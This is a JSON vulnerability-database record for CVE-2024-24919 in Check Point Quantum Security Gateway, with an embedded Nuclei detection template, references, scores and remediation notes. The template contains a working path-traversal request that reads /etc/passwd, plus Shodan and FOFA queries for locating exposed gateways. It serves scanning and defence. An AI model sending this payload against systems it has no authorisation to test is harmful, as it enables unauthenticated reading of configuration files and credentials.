{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-24919/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-24919/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-24919/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-24919/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-24919/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-24919"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-24919"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-24919.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-24919\n\ninfo:\n  name: Check Point Quantum Gateway - Information Disclosure\n  author: johnk3r,s4e-io\n  severity: high\n  description: |\n    Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on Check Point Security Gateways, potentially exposing sensitive configuration files and credentials.\n  remediation: |\n    Apply Check Point security fixes for CVE-2024-24919 as specified in SK182337.\n  reference:\n    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n    - https://support.checkpoint.com/results/sk/sk182337\n    - https://s4e.io/tools/check-point-quantum-gateway-information-disclosure-cve-2024-24919\n    - https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html\n    - https://censys.com/cve-2024-24919/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2024-24919\n    cwe-id: CWE-200\n    epss-score: 0.99978\n    epss-percentile: 0.9998\n    cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: checkpoint\n    product: quantum_security_gateway\n    shodan-query:\n      - html:\"Check Point SSL Network\"\n      - http.html:\"check point ssl network\"\n    fofa-query: body=\"check point ssl network\"\n  tags: cve,cve2024,checkpoint,lfi,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /clients/MyCRL HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip\n\n        aCSHELL/../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*\"\n          - \"nobody:.*\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402206392bb01b825df38a4f7bd3ca4307332c7b62cb9b4c716b7669006ee1da922a90220071b3ad3b29990d8d82ded6e0e0eba1cdacda128fdcb7ace45817bbda54fe6a0:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-24919"
}